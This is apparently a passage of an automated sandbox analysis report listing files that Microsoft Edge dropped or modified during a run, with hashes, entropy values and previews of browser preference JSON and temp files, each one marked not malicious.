                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\74d56165-3b5d-4c5f-850e-888e72039204.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45886
                                                                                                                                                                                  Entropy (8bit):6.0924155833428095
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:3DXzgWPsj/qlGJqIY8GB4xKyGti1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:3/Ps+wsI7yOK+MKtSmd6qE7lFov
                                                                                                                                                                                  MD5:EA45D88FD599FB7EE02401775DB963A4
                                                                                                                                                                                  SHA1:E9563B714E7ED0E7F34BAA1FA1324C2A35789C6A
                                                                                                                                                                                  SHA-256:9499097AE4754C19DB70E811DF50CB2805333A7E6C3CE53F9220C972F5B60374
                                                                                                                                                                                  SHA-512:1652F91E834E142D8697FACB09A6AF129265456FDC35D94405D8A3D26FDA16AB662F3D4778084AD0943C38A0D6C1681A53074B66283067B5C73545E171E61141
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\790314f3-c9d6-4043-95f7-0ac1be5b7ff7.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44898
                                                                                                                                                                                  Entropy (8bit):6.095204755186144
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWXHi1zNtTDmNMahWz9KJDSgzMMd6qD47u3+Ciob:+/Ps+wsI7ynfmgKtSmd6qE7lFob
                                                                                                                                                                                  MD5:475969CAA3ABC3B87BBA8A06A26416EC
                                                                                                                                                                                  SHA1:1F0D12C224795390E1996FF32EFB38B826D05D32
                                                                                                                                                                                  SHA-256:E5251D710E1B5A6A7F2F56B3C0253ED7D56F144521190BB45A2C2BD119397B75
                                                                                                                                                                                  SHA-512:5FE095478DBBFDE8C4C96BA5377667647E7329DA927A1AA81941A49A69C305C66F6FBE62DF71CEAD702F09AB558652826CC142D1537A8DD6185E9830AAC81C0C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\92c8d18d-04fa-4a15-9095-57c76cd280e7.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):44957
                                                                                                                                                                                  Entropy (8bit):6.095554059079671
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWtmi1zNt2C9RaDQrbFDdPVFe3KJDSgzMMd6qD47u3S:+/Ps+wsI7yOcMKtSmd6qE7lFoC
                                                                                                                                                                                  MD5:FE84E92018F3B968DA2014E41152C7CA
                                                                                                                                                                                  SHA1:C1F4F95B33FB70BA94CEFBEDF677F4389739351F
                                                                                                                                                                                  SHA-256:0FC85411DF19C624A8E3B2461BBC1D7FD1EAD204CE4E2779E615066E98C114F8
                                                                                                                                                                                  SHA-512:04359463768067F9498AB4229EE7F9772E56C905E4D91B6FFC72D85FEC604308DDB67F42003BD07E1C145E44C433EBDFEC56C9233E96972995B00CDA8547D6FA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\93f31f94-d187-416d-ba32-25aedd4ff3a0.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45888
                                                                                                                                                                                  Entropy (8bit):6.092452763439603
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5DXzgWPsj/qlGJqIY8GB4xKB9ri1zNt2C6RaDQrbFDdPVFe3KJDSgzMMd6qD47uv:5/Ps+wsI7yOKSzKtSmd6qE7lFov
                                                                                                                                                                                  MD5:59FDE905F94F8C076F3E3283A4DDF8CD
                                                                                                                                                                                  SHA1:9B1E507572E8180B49B5FB1F117322AF35D1E5B2
                                                                                                                                                                                  SHA-256:1C1C2C921D58C9A8F587B0F11698519CB3074660D089FFA6B0934577622B6571
                                                                                                                                                                                  SHA-512:9EB33BCB3CCBDA73EF312B955A14B7ED62F55EE550537F10DF815ED400131F91E3BB47A0D48B001F17BCD2307D35F0CF20E09245852439E236FD8221A1DEEB95
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"270EEF00BF873436BAE0FD02F259866ED05E6988F78734E2F33D6DB953BC6531\"","apps_count_check_time":"13352988566104161","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1708514970"},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXW

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-65D5DE93-2264.pma

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                  Entropy (8bit):0.04739453611246985
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:CrJ0pqtmKnOAtJY6JPi6VBKP7+G1gsXXnNIa5EvjBAIhL5Nvf++1gQ8z99tn8y0d:aJ0ctxzMqWnOhttLgH99t08T2RGOD
                                                                                                                                                                                  MD5:CBC9043C79841B1D66E34C83B37CD50E
                                                                                                                                                                                  SHA1:8DD7E35A180E69E8A8A8E17C8B352FBB58ACF45E
                                                                                                                                                                                  SHA-256:BA58870DA4143EEFCCCAFD7F1925302A63DDA19396D98D50E14E87C10963017D
                                                                                                                                                                                  SHA-512:2C15A2949B8BAF2B479AD71AE3E387FC2C534EFE30152B874C9D2A2E9981641579283A843518A2A52F840EE57AA197D7D47D7B12A796A10DDCD6A6E708BF46E6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...@..@...@.....C.].....@................j..PZ..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".tyefyt20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................. .2............... .2

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                  Entropy (8bit):4.0984945491284295
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                  MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                  SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                  SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                  SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1ac2bf8d-e7f5-416e-a2c7-61cc5437ba0a.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\32f24c7a-03f9-4810-a02d-2a5586e9e004.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):25185
                                                                                                                                                                                  Entropy (8bit):5.570782010074086
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjW2iW5w02f4ri8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPaSIH0+OrwXtGdWps:VvmjjiWa02fKiu1jalf/LdKt7
                                                                                                                                                                                  MD5:834E1966152105D83D9D46757EC7065B
                                                                                                                                                                                  SHA1:D04AF8717E0389EDB9A61920686CBE9E38CADC33
                                                                                                                                                                                  SHA-256:75FAF74683D7C1BA8D60DE0AD7392D1BD5E581DA12D23203E9F997A5374E36B5
                                                                                                                                                                                  SHA-512:B5D2E62A67143FF0F2E17A461B37B89304752337446C76200BB6E99E4E0B13F656152800EDA4ADC38D441ECE53649D227A48F355E3F839FE646E330FDB09B500
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\35d4fb33-29ee-415e-966c-64ae92b070f4.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14093
                                                                                                                                                                                  Entropy (8bit):5.238858716547755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:st+SPGouSuQKCsF13CDaSLlHVb2VbGqxwPLm2UV0sDxNkYJSHj:sDOoVu13CXYbG3YNAD
                                                                                                                                                                                  MD5:E31BF74E9D1E24DB549B4B2AAF3B6093
                                                                                                                                                                                  SHA1:BF31992AF1C84AAB0B5D021AC0969E71F4A88BDD
                                                                                                                                                                                  SHA-256:CE10670C1E9DC27D7789CE9CDC16EBF4F6A2BC77B1A33FD68F2C7DF2B941B884
                                                                                                                                                                                  SHA-512:EECDDDC37B7F77E0139BCBCDB5E196AFEA8D2C9644161DC8A1B31DC39B8C9931E5D2C904A1F16587AE8D9B7B338619EE919E7EA581E1256025B2503E73EA17A3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13352988565937492","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\43c579df-5310-456a-bc23-c3db47d96c00.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35446
                                                                                                                                                                                  Entropy (8bit):5.558154034307126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9oxKjW3iW5w02f4Gi8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPNSIH0FOrwX/487T7:VKUj2iWa02fBiu1ja+fcLv48fhxth
                                                                                                                                                                                  MD5:16090D47DD286B48BD5CAE39C9E890BA
                                                                                                                                                                                  SHA1:F67171C5C2A8F005AC779567DEF0570546BEBE51
                                                                                                                                                                                  SHA-256:1D9D2D328F05C665A48E139536069C3636320342C03A7B1D8CC5AF7E4E27D871
                                                                                                                                                                                  SHA-512:5F1B2E1AE04898FB7B40FB5F73ED1C3FC42153189F7DE01260904B92D9F14119F1A42A051DAA0ADF961C2C496D066578EBC3444013A3DC6FC9DAFC8512D8F2E9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\66ae5fef-d9ae-4cde-95bf-650e8ca7d147.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\75f2d656-bdf2-4696-a2e2-a6e73496c49f.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24691
                                                                                                                                                                                  Entropy (8bit):5.567990619159357
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:V9ZxMjWfiW5wj2f4ji8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPySIH0gOrwXthUpcm:Vvmj8iWaj2fGiu1jaXf/Ldxtk
                                                                                                                                                                                  MD5:1D2CA0D90087B30A444E6AA0C683AC73
                                                                                                                                                                                  SHA1:D47B84BE54902C9AA23CC3DAF0C8B667948D4A5A
                                                                                                                                                                                  SHA-256:7A9BF8225C24B4399E6B69D18E13E45E3011A5C519A7CDA78733CB8BF957E110
                                                                                                                                                                                  SHA-512:F444E88B78CF821E681CFF9D583F2D80014D183E7D2D2FE5E478BD0E56CC89266AF4B75CA1B8F0C4016A4540B856A793092C276CB43843A50DB9DD7A1BD824CA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13352988565277124","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13352988565277124","location":5,"ma

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\80e7fda5-87f3-4e1d-b6ea-8f614c42fb38.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
